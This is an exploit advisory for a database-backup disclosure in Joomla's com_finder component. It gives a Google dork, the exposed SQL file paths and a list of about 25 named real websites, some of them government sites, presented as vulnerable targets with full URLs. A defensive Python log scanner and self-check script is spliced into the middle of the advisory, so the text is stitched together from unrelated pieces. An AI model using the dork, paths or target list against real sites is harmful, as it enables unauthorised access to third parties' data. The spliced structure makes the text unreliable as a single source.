Joomla Com_Finder component version 4.0.0 suffers from a database disclosure vulnerability.
186354a6e3d9e945ec6f0d231330bbcf
#################################################################################################
# Exploit Title : Joomla Com_Finder Component 4.0.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 02/12/2018
# Vendor Homepage : joomla.org
# Software Download Links :
github.com/joomla/40-backend-template/tree/master/administrator/components/com_finder/sql
github.com/joomla/joomla-cms/archive/4.0.0-alpha1.zip
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 4.0
# Google Dorks : inurl:''/administrator/components/com_finder/''
# CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110189
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2259
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31521
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/administrator
# Exploit :
/administrator/components/com_finder/sql/install.mysql.sql
/administrator/components/com_finder/sql/install.postgresql.sql
/administrator/components/com_finder/sql/uninstall.mysql.sql
/administrator/components/com_finder/sql/uninstall.postgresql.sql
#################################################################################################
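The advisory above boils down to one thing: the installer SQL scripts of com_finder sit under the web root and are served to anyone who asks for them. The following is an added example, not part of the advisory and not Joomla project code, written from the defender's side. It does two jobs: it flags requests for these files in a web server access log (distinguishing a served file from a blocked probe), and it lets an administrator verify their own installation by fetching the four paths the advisory lists and checking whether the response actually looks like SQL. The log lines, hostnames and IP addresses are constructed for the example; the regexes and the `looks_like_sql_dump` heuristic are my own choices, not anything specified by the advisory.

```python
"""Detection and self-check helpers for web-readable Joomla installer SQL files.

Added example for the com_finder advisory; constructed data, not project code.
"""
import re
from typing import Dict, List, Optional

# The four paths named in the advisory, relative to the Joomla install root.
COM_FINDER_SQL_PATHS = [
    "/administrator/components/com_finder/sql/install.mysql.sql",
    "/administrator/components/com_finder/sql/install.postgresql.sql",
    "/administrator/components/com_finder/sql/uninstall.mysql.sql",
    "/administrator/components/com_finder/sql/uninstall.postgresql.sql",
]

# Generalisation (assumption): any .sql file under administrator/components/*/sql/
# is an installer artifact that has no business being served to a browser.
SQL_ARTIFACT_RE = re.compile(
    r"/administrator/components/com_[a-z0-9_]+/sql/[^\s?]+\.sql", re.IGNORECASE
)

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Heuristic markers of a Joomla installer script ("#__" is Joomla's table prefix placeholder).
SQL_MARKERS = ("CREATE TABLE", "DROP TABLE", "INSERT INTO", "#__")

# Constructed sample log: one served file, one blocked probe, one normal page view.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Dec/2018:10:15:01 +0000] "GET /administrator/components/com_finder/sql/install.mysql.sql HTTP/1.1" 200 9134 "-" "curl/7.61.0"',
    '203.0.113.7 - - [02/Dec/2018:10:15:02 +0000] "GET /administrator/components/com_finder/sql/uninstall.mysql.sql HTTP/1.1" 403 199 "-" "curl/7.61.0"',
    '198.51.100.4 - - [02/Dec/2018:10:16:30 +0000] "GET /index.php?option=com_finder&view=search HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_log_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format log line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(path: str, status: int) -> Optional[str]:
    """'exposed' if an installer .sql file was served, 'probe' if requested but not served."""
    if not SQL_ARTIFACT_RE.search(path):
        return None
    return "exposed" if 200 <= status < 300 else "probe"


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one alert record per request that touches an installer .sql path."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        status = int(rec["status"])
        label = classify_request(rec["path"], status)
        if label:
            alerts.append({"ip": rec["ip"], "path": rec["path"], "status": status, "label": label})
    return alerts


def looks_like_sql_dump(body: str) -> bool:
    """True if the first few KB of a response body read like an SQL script rather than an error page."""
    head = body[:4096].upper()
    return any(marker in head for marker in SQL_MARKERS)


def build_check_urls(base_url: str) -> List[str]:
    """Absolute URLs of the four advisory paths for a given Joomla install root."""
    return [base_url.rstrip("/") + p for p in COM_FINDER_SQL_PATHS]


if __name__ == "__main__":
    import sys
    import urllib.error
    import urllib.request

    if len(sys.argv) == 2:
        # Self-check of your own installation: python3 this.py https://your-site.example/
        for url in build_check_urls(sys.argv[1]):
            try:
                with urllib.request.urlopen(url, timeout=10) as resp:
                    body = resp.read(4096).decode("utf-8", "replace")
                    verdict = "EXPOSED" if looks_like_sql_dump(body) else "served, but not SQL"
            except urllib.error.HTTPError as exc:
                verdict = f"blocked ({exc.code})"
            except urllib.error.URLError as exc:
                verdict = f"error ({exc.reason})"
            print(url, "->", verdict)
    else:
        for alert in scan_access_log(SAMPLE_LOG):
            print(alert)
```

Run without arguments to see the detector over the constructed log; run with your own site's base URL to confirm whether the files are reachable. A `probe` alert is worth keeping even after the files are blocked, since it tells you who is checking for the exposure. The usual fix is a web server rule that denies direct requests for `*.sql` files (or the whole `administrator/components/*/sql/` tree); the status-code split in `classify_request` is what shows the rule is working.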
# Example Vulnerable Sites =>
[+] library.franklincountyva.gov/administrator/components/com_finder/sql/install.mysql.sql
[+] freightdb.kzntransport.gov.za/administrator/components/com_finder/sql/install.mysql.sql
[+] operaciavianocnedieta.sk/administrator/components/com_finder/sql/install.mysql.sql
[+] mvapower.com/MVASITE/administrator/components/com_finder/sql/install.mysql.sql
[+] kkn.cz/gdpr/administrator/components/com_finder/sql/install.mysql.sql
[+] labarjaque.com/administrator/components/com_finder/sql/install.mysql.sql
[+] elmwoodnebraska.com/nl/administrator/components/com_finder/sql/install.mysql.sql
[+] comesa.int/2016/administrator/components/com_finder/sql/install.mysql.sql
[+] xpilot-ai.org/administrator/components/com_finder/sql/install.mysql.sql
[+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_finder/sql/install.mysql.sql
[+] njebertappraisals.com/administrator/components/com_finder/sql/install.mysql.sql
[+] villaalena.cz/administrator/components/com_finder/sql/install.mysql.sql
[+] cosemsmg.org.br/site/administrator/components/com_finder/sql/install.mysql.sql
[+] isleofwightdiscos.co.uk/administrator/components/com_finder/sql/install.mysql.sql
[+] tgr.org.hk/administrator/components/com_finder/sql/install.mysql.sql
[+] recursosvirtualesperu.com/joomla/administrator/components/com_finder/sql/install.mysql.sql
[+] asbsteel.com/site/administrator/components/com_finder/sql/install.mysql.sql
[+] brisbug.asn.au/administrator/components/com_finder/sql/install.mysql.sql
[+] djabugay.org.au/Joomla/administrator/components/com_finder/sql/install.mysql.sql
[+] stoneandequipment.com/panama/administrator/components/com_finder/sql/install.mysql.sql
[+] vente-ordi.com/administrator/components/com_finder/sql/install.mysql.sql
[+] huili.fi/administrator/components/com_finder/sql/install.mysql.sql
[+] jbyouth.net/joomla/administrator/components/com_finder/sql/install.mysql.sql
[+] bristolacneremoval.co.uk/administrator/components/com_finder/sql/install.mysql.sql
[+] utilsoluciones.com/en/administrator/components/com_finder/sql/install.mysql.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################